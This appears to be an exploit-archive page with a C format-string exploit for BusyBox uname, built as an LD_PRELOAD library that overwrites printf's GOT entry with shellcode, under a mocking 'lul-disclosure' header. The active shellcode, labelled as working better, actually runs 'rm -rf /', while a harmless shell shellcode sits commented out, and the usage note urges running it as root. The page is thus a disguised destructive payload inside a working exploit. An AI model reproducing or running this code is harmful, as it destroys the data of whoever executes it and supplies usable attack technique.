BusyBox (uname) Local Format String Exploit
2008-07-01 00:00:00/*
* lul-busybox.c copyright (C) 2008 lul-disclosure inc. All rights reserved.
* this code is distributed with the LPL license agreement http://lul-disclosure.net/LPL.txt
* moar commonly known as the EULA (Epic User License Agreement)
*
* busybox uname format string exploit
* by towlie
*
* ADVANCED CREDITS:
*
* bug found by my irclog of andrewg pasting advanced vulnerability details into #social irc channel.
* TESO - For describing write primitive technology to write the shellcode to the stack.
*
* ADVANCED DISCREDITS:
*
* n0ah/k-special:
* for determining he invented the super
* advanced technology used in this exploit to write payload to the stack with a write4()
*
* ADVANCED VULNERABILITY DETAILS:
*
* busybox-version/uname.c:92:
* printf(((char *)(&uname_info)) + *delta); // LOL 2002AD CODING TECHNOLOGY
*
* ADVANCED USAGE ON HOW TO USE THIS SUPER ADVANCED PIECE OF TECHONOLOGY:
*
* compile as a shared lib:
* cc -fPIC -c lul-busybox.c -o busybox.o
* cc -shared -o busybox.so busybox.o
*
* EXAMPLE USAGE OF SUPER ADVANCED EXPLOIT TECHNOLOGY
*
* $ export LD_PRELOAD="./busybox.so"
* $ ./busybox_unstriped uname -a
* AAûÿ¿pûÿ¿vûÿ¿zûÿ¿ûÿ¿tûÿ¿xûÿ¿|ûÿ¿ûÿ¿~ûÿ¿rûÿ¿²ûÿ¿°
* 3221224326
* ...
* sh-3.2#
*
* ADVANCED EXPLOITATION NOTE:
* run this advanced piece of technology with the user privlages of uid 0 to obtain uid 0
*
* ADVANCED TERMS OF USAGE:
* THIS PIECE OF ADVANCED TECHNOLOGY MAY ONLY BE USED TO HACK COMPUTERS.
* BREAKING THE TERMS WILL RESULT IN ME PUNCHING YOUR FACE.
*
* ADVANCED GREETS SECTION:
* orbital for walking me through 90% of this exploit since i am fail LOLOL!
* jupiter for making the standard exploit header footer and LPL.
* Bruce Lee for being awesome.
* blaqjesus for continued lulz brother of Jesus H. Christ.
* people who are in it for the lulz.
*
*/
#include <stdio.h>
#include <string.h>
#include <sys/utsname.h>
#define OVERWRITE_ADDR 0x080e25b0 /* printf GOT address */
#define SHELLCODE_ADDR 0xbffffb70 /* where to write the shellcode */
#define PADDING_LEN 2
#define FMT_LEN (sizeof(sc)/2)+2
char sc[] =
// This shellcode works better
"\x6a\x0b\x58\x99\x52\x6a\x2f\x89\xe7\x52\x66\x68\x2d\x66\x89"
"\xe6\x52\x66\x68\x2d\x72\x89\xe1\x52\x68\x2f\x2f\x72\x6d\x68"
"\x2f\x62\x69\x6e\x89\xe3\x52\x57\x56\x51\x53\x89\xe1\xcd\x80";
/*
"\x6a\x0b" // push $0xb
"\x58" // pop %eax
"\x99" // cltd
"\x52" // push %edx
"\x68\x2f\x2f\x73\x68" // push $0x68732f2f
"\x68\x2f\x62\x69\x6e" // push $0x6e69622f
"\x89\xe3" // mov %esp, %ebx
"\x52" // push %edx
"\x53" // push %ebx
"\x89\xe1" // mov %esp, %ecx
"\xcd\x80"; // int $0x80
*/
char *put_addr(char *p, unsigned int addr);
char *build_fmt(char *p);
int uname(struct utsname *buf)
{
char *ptr;
ptr = (char *) &buf->sysname;
build_fmt(ptr);
return 0;
}
char *put_addr(char *p, unsigned int addr)
{
*p++ = (addr & 0x000000ff);
*p++ = (addr & 0x0000ff00) >> 8;
*p++ = (addr & 0x00ff0000) >> 16;
*p++ = (addr & 0xff000000) >> 24;
return p;
}
char *build_fmt(char *p)
{
struct shellcode_short {
unsigned short value;
unsigned long addr;
} shellcode[FMT_LEN], temp;
unsigned short *ptr;
unsigned long start;
int i, o, written;
start = SHELLCODE_ADDR;
ptr = (unsigned short *) ≻
for(i=0;i<FMT_LEN-2;i++, start+=2, ptr++) {
shellcode[i].value = *ptr;
shellcode[i].addr = start;
}
shellcode[FMT_LEN-2].addr = OVERWRITE_ADDR;
shellcode[FMT_LEN-2].value = (SHELLCODE_ADDR & 0x0000ffff);
shellcode[FMT_LEN-1].addr = OVERWRITE_ADDR + 2;
shellcode[FMT_LEN-1].value = (SHELLCODE_ADDR & 0xffff0000) >> 16;
for(o=0;o<((FMT_LEN)-1);o++) {
for(i=0;i<((FMT_LEN)-1-o);i++) {
if(shellcode[i+1].value < shellcode[i].value) {
temp.addr = shellcode[i].addr;
temp.value = shellcode[i].value;
shellcode[i].addr = shellcode[i+1].addr;
shellcode[i].value = shellcode[i+1].value;
shellcode[i+1].addr = temp.addr;
shellcode[i+1].value = temp.value;
}
}
}
for(i=0;i<PADDING_LEN;i++)
*p++ = '\x41';
for(i=0;i<FMT_LEN;i++)
p = put_addr(p, shellcode[i].addr);
written = (FMT_LEN)*4 + PADDING_LEN;
for(i=0;i<FMT_LEN;i++) {
p += sprintf(p, "%%%d$%uu%%%d$hn", i + 2,
shellcode[i].value - written, i + 2);
written = shellcode[i].value;
}
return p;
}
//
Fixes
No fixesPer poter inviare un fix è necessario essere utenti registrati.